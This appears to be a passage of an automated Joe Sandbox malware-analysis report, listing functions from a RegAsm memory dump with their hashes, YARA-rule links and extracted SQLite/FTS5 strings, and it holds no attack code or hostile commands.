Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 476d8908915b0c56be9c4f7b6e18f0430630907d974959a3cb2608332d5455b8
Instruction ID: ac74eb60c6fe1bce7f5108f0573fb4467c617b896612655e6eae2f8e7a399cb6
Opcode Fuzzy Hash: 476d8908915b0c56be9c4f7b6e18f0430630907d974959a3cb2608332d5455b8
Instruction Fuzzy Hash: 8B5191B0C002A0DBDB527B75DD8CA1B37BCBF20B46F185024E84EC3A91DB35E454DAA6

Uniqueness

Uniqueness Score: -1.00%

Function 19CD15C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

%!0.15g, xrefs: 19CD160A
JSON cannot hold BLOB values, xrefs: 19CD16D9
null, xrefs: 19CD15EE

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: 2c92bba88ec21b0a3c24d4eeaf6c5e83d779fb12756b2d90ad6d9e3d53fb73f7
Instruction ID: dfcd31982fa77a6ca03bfc8ce4a91b0c8bd8992da24cf7cdef5363b20ec97da1
Opcode Fuzzy Hash: 2c92bba88ec21b0a3c24d4eeaf6c5e83d779fb12756b2d90ad6d9e3d53fb73f7
Instruction Fuzzy Hash: 69418CB66047406BE3145B54FC82BAA77E4FB82329F0C0529F3D1C15D2D76AA59983E1

Uniqueness

Uniqueness Score: -1.00%

Function 19C41D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

no such database: %s, xrefs: 19C41E05
CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 19C41E2C

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: 76380017f3b14bfe3939a7515bc65abf8d70f4c0dfabb8333c27354f4d4f59a3
Instruction ID: 7d7f59df1b94953552ee634bc75e1c796956249161c07e2699159fbfdab0d74d
Opcode Fuzzy Hash: 76380017f3b14bfe3939a7515bc65abf8d70f4c0dfabb8333c27354f4d4f59a3
Instruction Fuzzy Hash: 053136B67003096BD3105F69EC00B6BB7D8FF95256F495179F9D89B280EA76E90087F0

Uniqueness

Uniqueness Score: -1.00%

Function 19CD31F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc9f317759a3284304fd58cf02d676547153cd92eaf5b52b292be1b9f7966cf
Instruction ID: bf847e10bccc8982753836f01a7c17e35209d55cabb7b96d552abd3dd2db1508
Opcode Fuzzy Hash: 3cc9f317759a3284304fd58cf02d676547153cd92eaf5b52b292be1b9f7966cf
Instruction Fuzzy Hash: D6F1F672A043419FD701CF24E88075ABBE0BF45368F48466DEAD997381E736E946CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 19C54E00 Relevance: 9.2, APIs: 6, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d9e12290368e50d976afff3eb4f39fcfd7b5b8f72b2619e3152c4c2916c9286
Instruction ID: cbc2b37b58ef185f9c620d5532e64b224a55ed4d334c08d52ebfd0dda3e85e17
Opcode Fuzzy Hash: 9d9e12290368e50d976afff3eb4f39fcfd7b5b8f72b2619e3152c4c2916c9286
Instruction Fuzzy Hash: 5B81AF72A04251DBE701EF28E88875BB7E8FF80755F480529F889D7281D736E508CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 19C46DA0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

recursively defined fts5 content table, xrefs: 19C46DE2

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: recursively defined fts5 content table
API String ID: 0-437020801
Opcode ID: 53b928620004c8950de8b6aac27ff6b0eb4d5315ef80b3cb5e9acbec82fb1d62
Instruction ID: fde3c86547bdf843040f3d1ec1cba45b7d901d156d90bd286cadde67cf857708
Opcode Fuzzy Hash: 53b928620004c8950de8b6aac27ff6b0eb4d5315ef80b3cb5e9acbec82fb1d62
Instruction Fuzzy Hash: C4D1F476A05341CFDB04CF19E480756BBE0FF89324FA8456EE8C98B285D775E486CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19CC6180 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

NEAR, xrefs: 19CC642A
fts5: syntax error near "%.*s", xrefs: 19CC6436
fts5 expression tree is too large (maximum depth %d), xrefs: 19CC6349
expected integer, got "%.*s", xrefs: 19CC648D

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$expected integer, got "%.*s"$fts5 expression tree is too large (maximum depth %d)$fts5: syntax error near "%.*s"
API String ID: 0-2846580575
Opcode ID: 1981d34d75fd8b16e497ecfabac2fc5cd15b71bb29f4738b5bfd9aa2742c0bdc
Instruction ID: 4bc4821991bbf874911aa969a518dfd18aca1a7d984ecf5e626a85d1b45f5292
Opcode Fuzzy Hash: 1981d34d75fd8b16e497ecfabac2fc5cd15b71bb29f4738b5bfd9aa2742c0bdc
Instruction Fuzzy Hash: E1C180B5904207AFC711CF61EB40B5AFBA4EF08354F1C8929E8859B682E775F560CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 19C5C0F0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 276COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C5C124, 19C5C16F
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C5C115, 19C5C160
database corruption, xrefs: 19C5C11F, 19C5C16A

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 0cdeec6106e962936f27a9555e05daa0ab66b119d50d2dfecbb1ac41eb512184
Instruction ID: cb9e08fa6deb1ebd9de99c7f7d3ead8621d5a675fa141af09f28612f798fedaf
Opcode Fuzzy Hash: 0cdeec6106e962936f27a9555e05daa0ab66b119d50d2dfecbb1ac41eb512184
Instruction Fuzzy Hash: E8A19F76A443019BD704DF29E880A6BBBE1FF88214F48466DF989D7351E731E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19D2ABF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D2AE1D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D2AE0E
misuse, xrefs: 19D2AE18
unable to delete/modify user-function due to active statements, xrefs: 19D2AD61

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: c73f0cce080f28ce918703eea1b6a0e8c1088db9370409b18c8b69385a32773f
Instruction ID: ab48f6860a9c5751a08af72c8232e7b3801658cfb63448e7b054dce874a6fdaa
Opcode Fuzzy Hash: c73f0cce080f28ce918703eea1b6a0e8c1088db9370409b18c8b69385a32773f
Instruction Fuzzy Hash: 3651F376604301AFD7108E24DC80B6BB7F4EF89759F98492DF58696AD1E331D8018B63

Uniqueness

Uniqueness Score: -1.00%

Function 19C3A860 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

tables_used, xrefs: 19C3A973, 19C3A97B
stmt-pointer, xrefs: 19C3A928
argument to %s() is not a valid SQL statement, xrefs: 19C3A97C
bytecode, xrefs: 19C3A96E

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
API String ID: 0-361449301
Opcode ID: 49c4f9275ee7512aa9279639dbb57c8309932d43c83369cc57d1d94d5238404e
Instruction ID: f0a49629f0b1c0edf201d8e178d919a8ce3dd72f7cf44d86fa2ff3140a709518
Opcode Fuzzy Hash: 49c4f9275ee7512aa9279639dbb57c8309932d43c83369cc57d1d94d5238404e
Instruction Fuzzy Hash: 4261F4B29003419FDB10CF28E88975377E8EF44306F49492DE4C6D6681D776EA68CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19D4BF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

fts5: %s queries are not supported (detail!=full), xrefs: 19D4C043
NEAR, xrefs: 19D4C03A
fts5 expression tree is too large (maximum depth %d), xrefs: 19D4C070
phrase, xrefs: 19D4C035, 19D4C042

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: aba3e2eda65aad27304b76e20196f09c48eb14a3e3c379784e36254118e5b32c
Instruction ID: ac9fda729a269f618732facc75f0a4f6844c1ad80df5a73ae54c7816ccb6cb98
Opcode Fuzzy Hash: aba3e2eda65aad27304b76e20196f09c48eb14a3e3c379784e36254118e5b32c
Instruction Fuzzy Hash: CE41F631E002169FD714CE24D980B9EB3E4EF94314F39856DE8864BE91E776EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19C523D0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 150COMMON

Download Yara Rule

Strings

no such database: %s, xrefs: 19C524B4
database %s is locked, xrefs: 19C52541
cannot detach database %s, xrefs: 19C524C3, 19C52547
main, xrefs: 19C52491

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: cannot detach database %s$database %s is locked$main$no such database: %s
API String ID: 0-3838832555
Opcode ID: 774629c73bc7ee622179f230432375b52ae5cbac85a8352e415d6f31167f7a42
Instruction ID: cf12f47c897bc402f0833e5f86923e9180d8f0a3101a1beb979a81f5b2830da1
Opcode Fuzzy Hash: 774629c73bc7ee622179f230432375b52ae5cbac85a8352e415d6f31167f7a42
Instruction Fuzzy Hash: 1951DEB67042019FE714CF15E891B1AB3E6BF84314F58855CF89A8B2D1DB31EC41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C6F490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C6F4BF
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C6F4B0
unable to delete/modify collation sequence due to active statements, xrefs: 19C6F533
misuse, xrefs: 19C6F4BA

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-3348720253
Opcode ID: cc1f81c591ca8e51549306fe9559f5988814128a5db4d207cbf24866dbf5ccbe
Instruction ID: 57eacb2c947db282da7bc3d4475fb3d847f0896d9ba36a5cb72eea21a9fd4061
Opcode Fuzzy Hash: cc1f81c591ca8e51549306fe9559f5988814128a5db4d207cbf24866dbf5ccbe
Instruction Fuzzy Hash: 5041F6736043415BD7008F18FCC0BAABBE4EF8132AF5C456EF5949B6D2D326E5158B61

Uniqueness

Uniqueness Score: -1.00%

Function 19C54C00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN), xrefs: 19C54CCB
invalid arguments to fts4aux constructor, xrefs: 19C54C9E
temp, xrefs: 19C54C3E

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN)$invalid arguments to fts4aux constructor$temp
API String ID: 0-537686372
Opcode ID: 09bf7f7457f1124f86f16d82092ed86d7cc5fab0d6ecf4039bc1db16d452da85
Instruction ID: 50ab4619e136866e4963384dfa76d11f38ceada27629012cb8ee078ae1c0bddc
Opcode Fuzzy Hash: 09bf7f7457f1124f86f16d82092ed86d7cc5fab0d6ecf4039bc1db16d452da85
Instruction Fuzzy Hash: B8412C763002419FD7148F58E880AA5BBF1EF85725F1C84ADECD78B242D632F901DB64

Uniqueness

Uniqueness Score: -1.00%

Function 19CFEBD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19CFEC51
